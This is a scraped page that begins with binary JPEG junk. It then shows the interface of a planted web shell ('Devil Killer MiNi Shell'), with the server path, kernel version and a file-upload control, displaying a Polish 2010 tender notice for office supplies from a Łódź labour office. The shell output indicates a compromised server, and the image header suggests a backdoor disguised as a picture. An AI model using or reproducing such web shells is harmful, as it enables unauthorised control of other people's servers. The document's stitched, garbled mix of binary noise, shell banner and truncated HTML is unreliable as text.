JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/172029-N-2010.html

<p class="kh_header"><b>Łódź: Dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 172029 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy nr 2 w Łodzi , ul. Kilińskiego 102/102a, 90-012 Łódź, woj. łódzkie, tel. 042 6768027, faks 042 6768004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup2.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A
1	Blok makulaturowy A4	format A4, ilość kartek 100, w kratkę	200 szt.
2	Blok makulaturowy A5	format A5, ilość kartek 100, w kratkę	200 szt.
3	Cienkopis np. Stabilo Point 88 lub równoważny	tusz odporny na wysychanie, plastikowa końcówka oprawiona w metal, wentylowana skuwka, szerokość linii pisania 0,4 mm, kolory: niebieski, czarny, zielony, czerwony	nieb.-170 szt.
czarny-160 szt.
ziel.-160 szt.
czerw.-160 szt.
4	Cienkopis kulkowy np. Pilot 
Hi-Tecpoint V5 Grip lub równoważny	skuwka z metalowym klipem, płynny tusz żelowy, szerokość linii 0,3 mm, kolor tuszu: niebieski	120 szt.
5	Długopis  np. Paper Mate STICK 2020 lub równoważny	intensywny tusz, odporny na światło, szerokość linii pisania F 0,3 mm, kolor obudowy i nasadki w kolorze tuszu: niebieski	2000 szt.
6	Długopis żelowy np.Pilot G2 lub równoważny	Automatyczny, przezroczysta obudowa, gumowy uchwyt, szerokość linii pisania 0,32 mm, kolory; niebieski, czarny, czerwony, zielony
niebieski-50 szt.
czarny-50 szt.
czerwony-50szt.
zielony- 50 szt.
7	Długopis żelowy np. UNI 120   lub równoważny	automatycznie chowany wkład, igłowa końcówka, gumowy uchwyt, pigmentowy tusz żelowy: wodoodporny i odporny na blaknięcie, szerokość linii pisania 0,4 mm, kolor tuszu niebieski	180 szt.
8	Dziurkacz np. Eagle Alpha P5024B lub równoważny	antypoślizgowa plastikowa nakładka, ogranicznik formatu (A4,A5,A6, Folio, Us Quart, 8x8x8), pojemnik na ścinki nie spada przy opróżnianiu, dziurkuje do 12 kartek, średnice dziurek 5,5mm	30 szt.
9	Etykiety uniwersalne ZW  np. Avery Zweckform lub równoważny	etykiety białe przeznaczone do wszystkich typów drukarek atramentowych, laserowych oraz ksero, klej odporny na wysoką temperaturę drukarek laserowych, etykiety ZW 1009  ( 70x42,3mm, ilość etykiet na arkuszu 21, ilość etykiet w opakowaniu 2100 ), etykiety ZW 1000 (210x297mm, ilość etykiet na arkuszu 1, ilość etykiet w opakowaniu 100)	10 op.
10 op.
10	Etykieta na segregator       np. Esselte lub równoważny
 	etykiety grzbietowe, samoprzylepne, szerokość 50mm, 10sztuk w opakowaniu	12 op.
11	Flamaster biurowy np. KAMET  lub równoważny	flamastry w 4 kolorach: czerwony,  czarny, zielony, niebieski 	czer. - 200 szt.
czar. - 250 szt.
nieb. - 100 szt.
ziel. - 50 szt.
12	Folia bezbarwna	folia do bindowania, bezbarwna, grubość 200 mic., ( 100 sztuk w opakowaniu )	5 op.
13	Grafit do ołówków automatycznych 0,5HB  np. Pentel  lub równoważny	grubość grafitu 0.5 mm, twardość HB,
( 12 sztuk w opakowaniu )	10 op.
14	Grafit do ołówków automatycznych 0,7HB np. Pentel  lub równoważny	grubość grafitu 0.7 mm, twardość 
HB ( 12 sztuk w opakowaniu )	10 op.
15	Grzbiet do bindowania  22mm	plastikowy, kolor biały, średnica             22 mm, ( 100 sztuk w opakowaniu )	2 op.
16	Grzbiet do bindowania  25mm	plastikowy, kolor zielony, średnica 25 mm, ( 100 sztuk w opakowaniu )	4 op.
17	Grzbiet do bindowania  16mm	plastikowy,  kolor biały, średnica 16 mm, ( 100 sztuk w opakowaniu )	5 op.
18	Gumka do ścierania np. Pentel   lub równoważny 	biała gumka do usuwania śladów ołówka, ZEH03, mini	100 szt.
19	Gumki recepturki	opakowanie - 1 kg	1 op.
20	Kalka ołówkowa A4 np. Delfin  lub równoważny	kalka do odbitek ręcznych, powlekana fioletową masą piszącą, format A4, ( 50 arkuszy w opakowaniu )	50 op.
21	Kalkulator biurowy np. SDC-810 IIB  lub równoważny	zaokrąglanie wyników, obliczanie sumy końcowej (GT), klawisz cofania, klawisz zmiany znaku+-, klawisz podwójnego zera, wymiary 100x125x34 mm  	20 szt.
22	Karton skóropodobny - okładki do bindowania np. Idest Delta lub równoważny	dwustronnie kolorowy, zielony, skóropodobny, 250 g-m2,        ( 100 szt w opakowaniu ).	5 op.
23	Klej w sztyfcie np. Pentel ERK lub równoważny	 nietoksyczny, wysokiej jakości, niebrudzący, zmywalny, atest PZH, do klejenia papieru, tektury, zdjęć i materiału, 8g	100 szt.
24	Klips do papieru np.Lewiatan     19  mm lub równoważny	wykonane z metalu, pakowane po 12 szt.	5 op.
25	Klips do papieru np.Lewiatan     51  mm lub równoważny	wykonane z metalu, pakowane po 12 szt.	5 op.
26	Kołonotatnik A4	oprawa miękka, ilość kartek 80, format A4	30 szt.
27	Korektor w piórze np. Pentel ZLC31/IDEST   lub równoważny  	płaska obudowa, cienka metalowa końcówka, pojemność 12 ml	50 szt.
28	Korektor w taśmie np. Tipp-Ex Mini Pocket Mouse lub równoważny	nie zawiera rozpuszczalników, wymiary taśmy 5mm x 5m, precyzyjnie i gładko koryguje każdy rodzaj pisma	20 szt.
29	Kostka biurowa np.IDEST klej lub równoważny	Biała -  8,5x8,5x3,5cm i kolorowa - 8,5x8,5x3,5cm                 	biała  - 50 szt.
kolor. - 30 szt.
30	Koszulki A4 twarda np. IDEST  lub równoważny	koszulka formatu A4 wykonana ze sztywnej wysokoprzezroczystej folii PCV o grubości 200 mic, multiperforowane - pasują do każdego segregatora, 
 ( opakowanie 25 szt. w folii )	10 op.
31	Koszulki A4 groszkowe np.INDEST lub równoważny	 format A4, miękkie, wykonane z folii PP, otwarte na górze, groszkowe  
( 100 szt. w opakowaniu )	 600 op.
32	Koszulki krystaliczne A4 np.Esselte lub równoważny	Format A4, wykonane z folii PP, multiperforowane, ( 100 szt. w pudełku)	6 pudełek
33	Książka korespondencyjna np.warta lub równoważny	oprawa twarda introligatorska, oklejana i szyta, ilość kart 192	25 szt.
34	Linijka	wykonana z plastiku, trwałe, nieścieralne podziałki, zaokrąglone rogi, długość  30 cm
60 szt.
35	Marker olejowy np. Uni Mitsubishi Pencil-Edding  lub równoważny	okrągła  końcówka, kolor czarny, do użytku na wszystkich powierzchniach (szorstkich i gładkich,nie traci koloru na słońcu), wodoodporny, odporny na ścieranie, o szerokości linii pisania 1,5-3,0mm	białe  - 5szt.
czarne - 5szt
36	Marker Twin CD-DVD np.PILOT lub równoważny	dwustronny, grubość linii pisania 07mm, czarny	8 szt.
37	Notes  karteczki samoprzylepne np.    IDEST lub równoważny	karteczki samoprzylepne  bloczek 100 kartek, ( 3 szt. w opakowaniu ), wymiary 40mm x 50 mm, kolor żółty	150 op.
38	Notes  karteczki samoprzylepne np.  EAGLE  lub równoważny	karteczki samoprzylepne bloczek 100 kartek,  wymiary 75 mm x 75 mm, kolor żółty.	700 szt.
39	Nożyczki np. Laco  lub równoważny	satynowe ostrze wykonane ze stali nierdzewnej, ergonomicznie wyprofilowana rękojeść z niełamliwego plastiku, w tekturowym opakowaniu, kolor czarny, dł. 21 cm	60 szt.
40	Nóż z wymiennymi ostrzami  Tiger np.Bantex lub równoważny	Obudowa z tworzywa sztucznego, elementy gumowe zapobiegające ślizganiu w dłoni, łamane wymienne ostrze ze stali nierdzewnej, przycisk blokujący, wzmocnione prowadzenie ostrza metalową szyną	3 szt.
41	Ołówek z gumką np. Stabilo Othello 2988 lub równoważny	odporny na złamania , z praktyczną gumką, twardość HB	500 szt.
42	Ołówek automatyczny np. Pentel lub równoważny	automatyczny, wymienna gumka, grubość grafitu 0,5 mm oraz 0,7 mm	0,7 mm - 30 szt.
0,5mm - 30 szt.
43	Ostrza wymienne do noża Tiger 	łamane ostrza ze stali nierdzewnej, (pakowane po 10 szt.)	2 op.
44	Pojemnik na pisma np. Esselte INTEGO lub równoważny	Z wysokiej jakości plastiku, wzmocniona podstawa gwarantuje stabilność, częściowo wycięty grzbiet ułatwia ustawienie pojemnika na półce, miejsce do zamocowania etykiety na grzbiecie, przezroczysty niebieski	20 szt.
45	Pojemnik na ulotki 1-3 A4 np. 
Combiboxx  lub równoważny	pojemnik na ulotki 1-3 A4, zestaw składa się z jednej półki 1-3 A4, przedniej osłony, dwóch nóżek i łącznika do połączenia z formatem A4, możliwość rozbudowy zestawu o kolejne półki poprzez pojemnik 1-3 A4, kolor: przezroczyste	20 szt.
46	Półka biurowa na dokumenty np.IDEST lub równoważny	wykonana z plastiku o wysokiej wytrzymałości, kolor: przezroczysty
	120 szt.
47	Przybornik wielofunkcyjny na biurko np.  Dual lub równoważny	wykonany z polistyrenu o dużej przejrzystości i funkcjonalności, zawiera bloczek papierowy i przegródki na korespondencję, kolor dymny	30 szt.
48	Rozszywacz biurowy np. Eagle Alpha R5025B  lub równoważny	metalowy, plastikowa oprawa, do zszywek 24-6, 26-6, nr 10, wyposażony w blokadę, mix kolorów	20 szt.
49	Segregator A4 7cm
 np. Esselte  Ekonomiczny lub równoważny	oklejony na zewnątrz poliolefiną, a wewnątrz jasnoszarym papierem, na dolnych krawędziach metalowe okucia, z mechanizmem dźwigniowym z dociskaczem, wzmocniony otwór na palec, dwa otwory na przedniej okładce na grzbiety mechanizmu blokujące okładkę po zamknięciu, szerokość grzbietu 75 mm, wymienna etykieta opisowa, kolory: niebieski, czerwony, zielony, czarny	nieb. - 75 szt.
czerw. - 75 szt.
ziel. - 75 szt.
czar. - 75 szt.
50	Segregator A4 5cm np. Esselte Ekonomiczny lub równoważny	oklejony na zewnątrz poliolefiną, a wewnątrz jasnoszarym papierem ,z mechanizmem dźwigniowym z dociskaczem, na dolnych krawędziach metalowe okucia, wzmocniony otwór na palec, dwa otwory na przedniej okładce na grzbiety mechanizmu blokujące okładkę po zamknięciu, szerokość grzbietu 50 mm, wymienna etykieta opisowa, kolory: niebieski, czerwony, zielony, czarny	nieb. - 50 szt.
czerw. - 50 szt.
ziel. - 50 szt.
czar. - 50 szt.
51	Skorowidz 1-2A4 np.Grand lub równoważny	szyty, w twardej, wytrzymałej i lakierowanej oprawie, wyposażony w tłoczony indeks, w kratkę, format 1-2 A4, ilość kartek 96	15 szt.
52	Skorowidz A4 np.Grand lub równoważny	szyty, w twardej, wytrzymałej i lakierowanej oprawie, wyposażony w tłoczony indeks, w kratkę, format A4, ilość kartek 96	30 szt.
53	Spinacze duże np. Grand R50  lub równoważny	spinacz owalny, metalowy, plikowy, długość 50 mm ( 100 szt. w opakowaniu)	40 op.
54	Spinacze małe np. Grand R28  lub równoważny	spinacz okrągły, metalowy, długość 28 mm ( 100 szt. w opakowaniu )	300 op.
55	Sznurek dratwa	25 dkg
	5 szt.
56	Taśma biurowa np. Grand  lub równoważny 	taśma biurowa, idealnie przezroczysta taśma klejąca, wykonana z polipropylenu, pokryta emulsyjnym klejem akrylowym, wym. 18 mm x 10 m  ( 8 szt. w opakowaniu )	25 op.
57	Taśma dwustronna montażowa np.Grand lub równoważny	Dwustronnie klejąca, piankowa o grubości 1,5mm, 24mmx5m	10 szt.
58	Taśma  np. DYMO l lub równoważny	taśma do drukarek DYMO, przeznaczona do inwentaryzacji śr. trwałych, opisywania produktów, bardzo trwała, kolor druku czarny, kolor taśmy żółty, wymiary 9 mm x 7 m   	5 szt.
59	Taśma pakowa np. Grand lub równoważny	polipropylenowa, jednostronnie klejąca, 48mmx50m, kolor brązowy	20 szt.
60	Teczka A4 z klipem np. biurfol lub równoważny	Z dwiema sztywnymi okładkami oraz mechanizmem zaciskowym do papieru, na wewnętrznej stronie okładki  kieszeń oraz uchwyt na długopis kolor niebieski	4 szt.
61	Teczka do podpisu A4	na dokumenty o formacie A4, okładka z twardego kartonu pokrytego folią PP lub sztuczną skórą, rozciągliwy grzbiet,  min.20 przegródek ułatwiających umieszczanie dokumentów, specjalne otwory na przegródkach pozwalające grupować i odnajdywać dokumenty,  mix kolorów	15 szt.
62	Temperówka	plastikowa, wyposażona w pojemnik na ostrużyny, stalowe ostrze, do temperowania standardowych oraz grubych ołówków	60 szt.
63	Wąsy do skoroszytu	wykonane z ekologicznego polipropylenu, z metalową blaszką, mix kolorów
 ( 100 szt. w opakowaniu )	czar.-80 op.
biał.-80 op.
żółt.-80 op.
64	Wizytownik alfabetyczny	na 200 wizytówek 4 ringowy mechanizm	3 szt.
65	Wkład do długopisu zwykły np. Kamet lub równoważny	wkład cienki do długopisu, kolor niebieski	200 szt.
66	Wkład do długopisu żelowego UNI120	Wkład UMR-85 do długopisu żelowego, czarny	180 szt.
67	Wkład do pióra kulkowego np.uni  UB-200 UNI lub równoważny	wkład UBR - 90 do długopisu kulkowego, kolor niebieski 	50 szt.
68	Wkład do pióra żelowego UMN- 152 UNI	wkład UMR-85 do pióra żelowego, kolor niebieski	50 szt.
69	Wkład do długopisu np. Zenith lub równoważny	wkład metalowy do długopisu, kolor niebieski (20 szt. w opakowaniu)	5 op.
70	Zakładka indeksująca samoprzylepna np.3M Post-it z nadrukiem lub równoważny	25x43 mm z ikoną: ręka+ołówek	2 op.
71	Zakreślacz  np. STABILO lub równoważny	fluorescencyjny tusz na bazie wody, szerokość linii pisania 2-5 mm, ścięta końcówka, do pisania po wszystkich rodzajach papieru, w tym samokopiującym i faksowym, kolory: niebieski, zielony, różowy, żółty, pomarańczowy.	nieb. - 70 szt.
ziel. - 70 szt.
róż. - 70 szt.
żół. - 70 szt.
pomar. - 70 szt.
72	Zeszyt 96 krata A4 np. Inter Druk  lub równoważny	oprawa miękka, format A4, kratka, 96 kartek	150 szt.
73	Zeszyt 60 krata A4 
np. Dan-mark lub równoważny	oprawa miękka, forma A4, kratka, 60 kartek	150 szt.
74	Zeszyt 60 krata A5 np. Inter Druk lub równoważny 	oprawa miękka, format A5, kratka, 60 kartek	150 szt.
75	Zeszyt  B5 np. Inter Druk  lub równoważny	brulion, oprawa twarda, format B5, 160 kartek	20 szt.
76	Zszywacz np. Laco H 2000  lub równoważny	metalowa konstrukcja i uchwyt z niełamliwego plastiku, podstawa w kolorze jasnoszarym, ładowany od góry, możliwość  zaginania zszywek do wewnątrz i na zewnątrz, pojemność magazynka 100 zszywek, kolor niebieski i czerwony	nieb. - 50 szt.
czer. - 50 szt.
77	Zszywacz np. Laco H4100 lub równoważny	ciężki do 100 kartek, pojemność magazynka 100 zszywek, kolor czarny	2 szt.
78	Zszywacz mini np. Leitz lub równoważny	zintegrowany rozszywacz, do 10 kartek	20 szt.
79	Zszywki nr.10 np. GRAND lub równoważny	cynkowane, opakowanie 1000 szt.	30 op.
80	Zszywki np. Grand 24-6 lub równoważny	niklowane zszywki biurowe, grubość zszywanego pliku do 20 kartek, 
( 1000 szt. w opakowaniu )	550 op.
81	Zszywki 23-13 np. Leviatan lub równoważny	zszywki specjalistyczne HD 23/13 , grubość zszywanego pliku do 90 kartek, ( 1000 szt. w opakowaniu )	10 op.
82	Zwilżacz maczałka 	zwilżacz glicerynowy, nietoksyczny na bazie gliceryny kosmetycznej, bezbarwny, bezwonny, pojemność 20 ml 	10 szt.
Część B    
1	Koperta C6 format C6, samoprzylepna biała, bez okienka ( 1000 szt. w opakowaniu )	80 op.
2	Koperta B5	format  B5, samoprzylepna brązowa z paskiem, bez okienka
 ( 500 szt. w opakowaniu )	5 op.
3	Koperta B4	format B4, samoprzylepna biała z paskiem, bez okienka ( 250 szt. w opakowaniu )	5 op.
4	Koperta B4	format B4, samoprzylepna brąz z paskiem, bez okienka ( 250 szt. w opakowaniu )	5 op.
5	Segregator A4 marmur 8cm np. Idest lub równoważny	wykonany z twardej tektury, wzmocniony metalowymi kantami, pokryty okleiną papierową w czarno-biały marmurek, z mechanizmem dźwigowym z dociskaczem, wzmocniony otwór na palec, dwa otwory na przedniej okładce grzbietu mechanizmu blokujące okładkę po zamknięciu , szerokość grzbietu 8 cm,  format A4
	1200  szt.
6	Skoroszyt zwykły   np.IDEST lub równoważny	wykonany z kartonu o grubości 250g, biały, metalowe wąsy (50 szt. w opakowaniu)	500 op.
7	Bloki do flipchartów	format A1, 30 kartek, otwory do zawieszania, gładkie	20 szt.
8	Długopis na łańcuszku np.  Beifa lub równoważny	samoprzylepna podstawka zapobiegająca zgubieniu długopisu, łańcuszek długości 58 cm, kolor tuszu niebieski	120 szt.
9	Papier ksero kolor np. Trophee lub równoważny	format A4, 12 opakowań 160g/m2 w kolorze kremowym (250 arkuszy w opakowaniu), 7 opakowań 80g-m2 w kolorze zieleń naturalna (500 arkuszy w opakowaniu), 7 opakowań 80g-m2 w kolorze jasny niebieski ( 500 arkuszy w opakowaniu ), 7 opakowań 80g-m2 w kolorze żółtym (500 arkuszy w opakowaniu), 7 opakowań 80g-m2 w kolorze kremowym  (500 arkuszy w opakowaniu)	160g-m2 kremowy - 12 op.
80g/m2 ziel. nat.   - 7 op.
80g/m2 jasn. nieb.   - 7 op.
80g/m2 żółty  
 - 7 op.
80g/m2 kremowy   - 7 op.
10	Pinezki do tablic np.WIGOR lub równoważny	pinezki do tablic, kolorowe 
 ( 50 szt. w opakowaniu )	15 op.

11	Pióro kulkowe  np. UNI Mitsubishi Pencil UB-104 lub równoważny	Przebija przez kalkę i druki samokopiujące, pisze po śliskich powierzchniach, wysokiej jakości tusz, średnica kulki 0,5mm, grubość linii ok. 0,3mm	200 szt.
12	Pudełko archiwizacyjne	służące do przechowywania dokumentów formatu A4, wykonane z falistej, bezkwasowej tektury o parametrach spełniających europejskie wymogi, z otworem i miejscem do opisu zawartości zlokalizowanymi  na grzbiecie pojemnika, o szerokości 10 cm i 15 cm, kolor biały	szer. 10 cm - 
200 szt.
szer. 15 cm - 200szt.
13	Skoroszyt PCV A4 zawieszany, mix kolorów	skoroszyt wpinany do segregatora, wykonany z mocnego i sztywnego PCV, przednia okładka przezroczysta, tylna kolorowa, papierowy wysuwany pasek opisowy, po przeciwnych stronach grzbietu 2 wycięcia ułatwiające wysuwanie paska, zaokrąglone rogi, boczna perforacja ( 10 szt. w opakowaniu )	niebieski-25 op.
czerwony-25 op.
zielony -25 op.
żółty-25 op.
14	Teczka wiązana	wykonana z kartonu o grubości 250 g-m2, kolor biały, na dokumenty formatu A4, (50 szt. w opakowaniu)	12 op.
15	Teczka z gumką np. IDEST lub równoważny	wykonana z mocnego , barwionego i lakierowanego z jednej strony kartonu o gramaturze 400g-m2, zamykana na gumkę, 3 zakładki chroniące dokumenty przed wypadaniem, na dokumenty formatu A4, mix kolorów, (10 szt. w opakowaniu)	biały-5 op.
czerwony-5 op
czarny-5 op.
żółty-5 op.

Część C
1	Papier A4 np.Rey Copy lub równoważny	Parametry nie gorsze niż: białość 146 CIE (?3), gładkość     220 cm3-min (?60), wilgotność    3,8 - 5,0 %, gramatura 80g - m2 (?3), musi spełniać wszystkie warunki umożliwiające dwustronny zadruk 
( 500 arkuszy w ryzie )	2100 ryz
2	Papier A3 np.Rey Copy lub równoważny	Parametry nie gorsze niż: białość 146 CIE (?3), gładkość     220 cm3-min (?60), wilgotność    3,8 - 5,0 %, gramatura 80g -m2 (?3), musi spełniać wszystkie warunki umożliwiające dwustronny zadruk 
( 500 arkuszy w ryzie )
15 ryz
1.	Wszystkie artykuły biurowe będące przedmiotem zamówienia muszą być wyrobami fabrycznie nowymi, nieużywanymi.
2.	Na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do przedmiotu zamówienia odpowiedni certyfikat zgodności z Polską Normą lub normami europejskimi.
3.	Zamawiający dopuszcza możliwość złożenia ofert równoważnych w zakresie oferowanych artykułów biurowych pod warunkiem spełnienia wszystkich parametrów określonych w opisie przedmiotu zamówienia ( w tabelach ).
4.	W przypadku zaproponowania produktu równoważnego wymaga się, aby odpowiadał on pod względem jakości, trwałości, funkcjonalności oraz estetyki wykonania produktom wskazanym przez Zamawiającego.
5.	W przypadku stwierdzenia, że dostarczone artykuły biurowe:
-	są uszkodzone, posiadają wady uniemożliwiające użytkowanie, a wady
 i uszkodzenia te nie powstały z winy Zamawiającego lub
-	nie spełniają wymagań Zamawiającego określonych w opisie przedmiotu zamówienia ( w tabelach ).
-	dostarczone produkty równoważne nie odpowiadają pod względem jakości, trwałości, funkcjonalności oraz estetyki wykonania produktom wskazanym przez Zamawiającego,
           Wykonawca wymieni je na nowe, prawidłowe, na własny koszt.

Przedmiot zamówienia obejmuje również dostawę ww materiałów biurowych do siedziby Zamawiającego w terminie wyznaczonym przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie minimum 2 dostaw materiałów biurowych o wartości każdej z nich, nie mniejszej niż:      dla części A - 30.000,00 zł brutto, dla części B - 17.000,00 zł. brutto, dla części C - 17.000,00 zł brutto. Należy wypełnić załącznik nr 4 do niniejszej specyfikacji oraz przedłożyć dokumenty potwierdzające należyte wykonanie usług</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedstawienie opłaconej polisy ubezpieczeniowej, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż cena ofertowa Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
